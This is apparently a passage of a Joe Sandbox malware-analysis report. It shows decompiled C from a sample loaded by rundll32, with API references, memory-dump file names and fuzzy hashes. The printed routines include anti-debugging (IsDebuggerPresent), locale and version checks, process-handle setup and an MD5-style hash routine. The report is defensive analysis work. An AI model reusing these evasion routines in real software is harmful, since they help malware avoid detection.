												 *0x702e4240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x702e41f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x702e4200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x702e41fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x702e4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x702e4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x702e4240 = 1;
							__eflags =  *0x702e4240;
							if( *0x702e4240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x702e4200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x702e4200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x702e4240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x702e4200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x702e41f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x702e4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x702e4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x702e249f
0x702e24a2
0x702e24a8
0x702e24c6
0x00000000
0x702e24c6
0x702e24b0
0x702e24b9
0x702e24bf
0x702e24ce
0x702e24d1
0x702e24d4
0x702e24de
0x702e24de
0x702e24e0
0x702e24e3
0x702e24e5
0x702e24e5
0x702e24e7
0x702e24ea
0x00000000
0x00000000
0x702e24ec
0x702e24ee
0x702e2554
0x702e2554
0x702e26b2
0x00000000
0x702e26b2
0x702e24f0
0x702e24f0
0x702e24f4
0x702e24f6
0x702e24f6
0x702e24f6
0x702e24f6
0x702e24f9
0x702e24fa
0x702e24fd
0x702e24fd
0x702e2501
0x702e2505
0x702e2513
0x702e2513
0x702e251b
0x702e2521
0x702e2523
0x702e2525
0x702e2535
0x702e2542
0x702e2546
0x702e254b
0x702e254d
0x702e25cb
0x702e25cb
0x702e254f
0x702e254f
0x702e254f
0x702e25cd
0x702e25cf
0x702e26b0
0x702e26b0
0x00000000
0x702e25d5
0x702e25d5
0x702e25dc
0x00000000
0x00000000
0x702e25e2
0x702e25e6
0x702e2642
0x702e2644
0x702e264c
0x702e264e
0x702e2650
0x00000000
0x00000000
0x702e2652
0x702e2658
0x702e265a
0x702e265c
0x702e2671
0x702e2671
0x702e2673
0x702e26a2
0x702e26a9
0x00000000
0x702e26a9
0x702e2677
0x702e2678
0x702e267a
0x702e267c
0x702e267c
0x702e267e
0x702e2680
0x702e2682
0x702e2696
0x702e2696
0x702e2699
0x702e269b
0x702e269b
0x702e269c
0x702e269c
0x00000000
0x702e2684
0x702e2684
0x702e2684
0x702e268d
0x702e268e
0x702e2690
0x702e2692
0x702e2692
0x00000000
0x702e2684
0x702e2682
0x702e265e
0x702e2665
0x702e2665
0x702e2667
0x00000000
0x00000000
0x702e2669
0x702e266a
0x702e266d
0x702e266f
0x00000000
0x00000000
0x00000000
0x702e266f
0x00000000
0x702e2665
0x702e25e8
0x702e25eb
0x702e25f0
0x00000000
0x00000000
0x702e25f9
0x702e25fb
0x702e2601
0x00000000
0x00000000
0x702e2607
0x702e260d
0x00000000
0x00000000
0x702e2613
0x702e2615
0x702e261e
0x702e2622
0x00000000
0x00000000
0x702e2628
0x702e262b
0x702e262d
0x00000000
0x00000000
0x702e2634
0x702e2636
0x00000000
0x00000000
0x702e2638
0x702e263c
0x00000000
0x00000000
0x00000000
0x702e263c
0x00000000
0x00000000
0x00000000
0x702e2527
0x702e2527
0x702e2527
0x702e252e
0x00000000
0x00000000
0x702e2530
0x702e2531
0x702e2533
0x00000000
0x00000000
0x00000000
0x702e2533
0x702e255b
0x702e255d
0x00000000
0x00000000
0x702e256d
0x702e256f
0x702e2571
0x00000000
0x00000000
0x702e2577
0x702e257e
0x702e25aa
0x702e25aa
0x702e25ac
0x702e25ae
0x702e25c2
0x702e25c4
0x00000000
0x00000000
0x00000000
0x00000000
0x702e25b0
0x702e25b0
0x702e25b0
0x702e25b9
0x702e25ba
0x702e25bc
0x702e25be
0x702e25be
0x00000000
0x702e25b0
0x702e2580
0x702e2583
0x702e2585
0x702e2597
0x702e2597
0x702e259a
0x702e259c
0x702e259c
0x702e259d
0x702e259d
0x702e25a3
0x00000000
0x00000000
0x00000000
0x00000000
0x702e2587
0x702e2587
0x702e2587
0x702e258e
0x00000000
0x00000000
0x702e2590
0x702e2590
0x702e2591
0x00000000
0x00000000
0x00000000
0x702e2591
0x702e2593
0x702e2595
0x702e25a8
0x00000000
0x00000000
0x00000000
0x702e25a8
0x00000000
0x702e2595
0x702e2507
0x702e250a
0x702e250d
0x00000000
0x00000000
0x702e250f
0x702e2511
0x00000000
0x00000000
0x00000000
0x702e2511
0x702e24d6
0x702e24d8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 702E2546

Strings

@B.p, xrefs: 702E2565
@B.p, xrefs: 702E26A4
@B.p, xrefs: 702E2647

Memory Dump Source

Source File: 0000001C.00000002.736184582.00000000702E1000.00000020.00020000.sdmp, Offset: 702E0000, based on PE: true

Associated: 0000001C.00000002.736175790.00000000702E0000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736193058.00000000702E3000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736201655.00000000702E5000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.736210754.00000000702E6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702e0000_rundll32.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID: @B.p$@B.p$@B.p
API String ID: 2850889275-2726570681
Opcode ID: 5857183b25d282757ec6663ee2a78230c9167af48d051fceb3dc577ccfaaa4b9
Instruction ID: fc3fb893d05c3e130b4979564cf9ef63791ae1e1224c0d8d70aea9b6a7c1890e
Opcode Fuzzy Hash: 5857183b25d282757ec6663ee2a78230c9167af48d051fceb3dc577ccfaaa4b9
Instruction Fuzzy Hash: B161B6336806038FDB1ACF2BD9AC75D33BAAB45314BE4812DD917C7194E770DCA98A50

Uniqueness

Uniqueness Score: -1.00%

Function 702E1262, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E702E1262() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x702e41b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x702e41bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x702e41ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x702e41a8 = _t5;
					 *0x702e41b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x702e41a4 = _t6;
					if(_t6 == 0) {
						 *0x702e41a4 =  *0x702e41a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x702e1263
0x702e1271
0x702e1279
0x702e127e
0x702e12c8
0x702e12c8
0x702e1280
0x702e1288
0x702e12c4
0x702e12c6
0x702e128a
0x702e128a
0x702e128f
0x702e129d
0x702e12a2
0x702e12a8
0x702e12b0
0x702e12b5
0x702e12b7
0x702e12b7
0x702e12c1
0x702e12c1

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,702E1E88,74B063F0,00000000), ref: 702E1271
GetVersion.KERNEL32 ref: 702E1280
GetCurrentProcessId.KERNEL32 ref: 702E128F
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 702E12A8

Memory Dump Source

Source File: 0000001C.00000002.736184582.00000000702E1000.00000020.00020000.sdmp, Offset: 702E0000, based on PE: true

Associated: 0000001C.00000002.736175790.00000000702E0000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736193058.00000000702E3000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736201655.00000000702E5000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.736210754.00000000702E6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702e0000_rundll32.jbxd

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 9624d004413333fb505e0da8c9305b98580bd8f64208e1f938a075c42187171f
Instruction ID: 476c3b585d75bcca9bf2f6aa4f9ddf484be31cb91a60268afe41bd3320271c08
Opcode Fuzzy Hash: 9624d004413333fb505e0da8c9305b98580bd8f64208e1f938a075c42187171f
Instruction Fuzzy Hash: 37F01D736C8210AEEB51AF7BAC8D7853BA4A715B12F30416AE609CD1E0D3B04581BB54

Uniqueness

Uniqueness Score: -1.00%

Function 702E1813, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E702E1813(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4);
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x702e1817
0x702e1828
0x702e1830
0x702e1832
0x702e1845
0x702e1845
0x702e184f

APIs

GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,702E1AA1,?,702E1EEC,?,00000000,00000001,?,?,?,702E1EEC), ref: 702E1828
GetSystemDefaultUILanguage.KERNEL32(?,?,702E1AA1,?,702E1EEC,?,00000000,00000001,?,?,?,702E1EEC), ref: 702E1832
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,702E1AA1,?,702E1EEC,?,00000000,00000001,?,?,?,702E1EEC), ref: 702E1845

Memory Dump Source

Source File: 0000001C.00000002.736184582.00000000702E1000.00000020.00020000.sdmp, Offset: 702E0000, based on PE: true

Associated: 0000001C.00000002.736175790.00000000702E0000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736193058.00000000702E3000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736201655.00000000702E5000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.736210754.00000000702E6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702e0000_rundll32.jbxd

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: c372de523356407e5ce4ac38d0f60e8d55b10de2ff06170f74485b976f1f25fd
Instruction ID: 2ef0a009372e3e876d16387be41bc33d0577ccadb29b5d48351e6680de326140
Opcode Fuzzy Hash: c372de523356407e5ce4ac38d0f60e8d55b10de2ff06170f74485b976f1f25fd
Instruction Fuzzy Hash: 3CE04875684209B6E700D792CD0FF7D72B8A700B16F500094F701D61C0D6749E04A765

Uniqueness

Uniqueness Score: -1.00%

Function 7030E9E0, Relevance: 3.0, APIs: 2, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(70308D59), ref: 7030E9E0
DebuggerProbe.LIBCMTD ref: 7030E9EF

Part of subcall function 7030EA10: RaiseException.KERNEL32(406D1388,00000000,00000006,00001001), ref: 7030EA6C

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: Debugger$ExceptionPresentProbeRaise
String ID:
API String ID: 680636614-0
Opcode ID: 23def514796b887f261ee5be5a61a3e9823e994dfdfc97b4fadd757c03995e17
Instruction ID: 136c44171af7e94ee51411b6beeb506b9a5a85bddd63a89ffc4db2654ab85a7a
Opcode Fuzzy Hash: 23def514796b887f261ee5be5a61a3e9823e994dfdfc97b4fadd757c03995e17
Instruction Fuzzy Hash: 0EC08C6834314606EE0006320E093DA3166371874BF4005B86D07C4181EA46E880C011

Uniqueness

Uniqueness Score: -1.00%

Function 04446680, Relevance: 1.9, APIs: 1, Instructions: 610
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E04446680(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}

0x04446683
0x0444668e
0x04446691
0x04446694
0x04446695
0x04446695
0x044466a0
0x044466b1
0x044466b3
0x044466b6
0x044466b6
0x044466b9
0x044466b9
0x044466bc
0x044466bc
0x044466bf
0x044466bf
0x044466dc
0x044466df
0x044466f5
0x044466f8
0x04446712
0x04446715
0x0444672b
0x0444672e
0x04446730
0x04446748
0x0444674b
0x0444674e
0x04446766
0x04446769
0x04446783
0x04446786
0x0444679c
0x0444679f
0x044467a1
0x044467b9
0x044467be
0x044467c1
0x044467d7
0x044467da
0x044467f4
0x044467f7
0x0444680d
0x04446810
0x04446812
0x0444682d
0x04446830
0x04446847
0x0444684a
0x0444684e
0x04446867
0x0444686a
0x0444686c
0x0444686f
0x0444688a
0x0444688d
0x044468a6
0x044468a9
0x044468b9
0x044468bc
0x044468d4
0x044468d7
0x044468f1
0x044468f4
0x0444690c
0x0444690f
0x04446925
0x04446928
0x04446940
0x04446943
0x0444695b
0x0444695e
0x04446978
0x0444697b
0x04446991
0x04446994
0x044469ac
0x044469af
0x044469c9
0x044469cc
0x044469e4
0x044469e7
0x044469fd
0x04446a00
0x04446a18
0x04446a1b
0x04446a33
0x04446a36
0x04446a48
0x04446a4b
0x04446a5d
0x04446a60
0x04446a72
0x04446a75
0x04446a79
0x04446a89
0x04446a8c
0x04446a9a
0x04446a9d
0x04446aaf
0x04446ab2
0x04446ac6
0x04446ac9
0x04446acb
0x04446adb
0x04446ade
0x04446af0
0x04446af3
0x04446b01
0x04446b04
0x04446b16
0x04446b19
0x04446b1d
0x04446b2d
0x04446b30
0x04446b42
0x04446b45
0x04446b53
0x04446b56
0x04446b68
0x04446b6b
0x04446b7d
0x04446b80
0x04446b94
0x04446b97
0x04446bab
0x04446bae
0x04446bc2
0x04446bc5
0x04446bd9
0x04446bdc
0x04446bf0
0x04446bf3
0x04446c07
0x04446c0c
0x04446c1e
0x04446c21
0x04446c35
0x04446c38
0x04446c4c
0x04446c4f
0x04446c65
0x04446c68
0x04446c7c
0x04446c7f
0x04446c91
0x04446c94
0x04446ca8
0x04446cab
0x04446cbf
0x04446cc2
0x04446cd6
0x04446cdf
0x04446ce2
0x04446ceb
0x04446cf4
0x04446cfc
0x04446d04
0x04446d0e
0x04446d23

APIs

memset.NTDLL ref: 04446D17

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: memset
String ID:
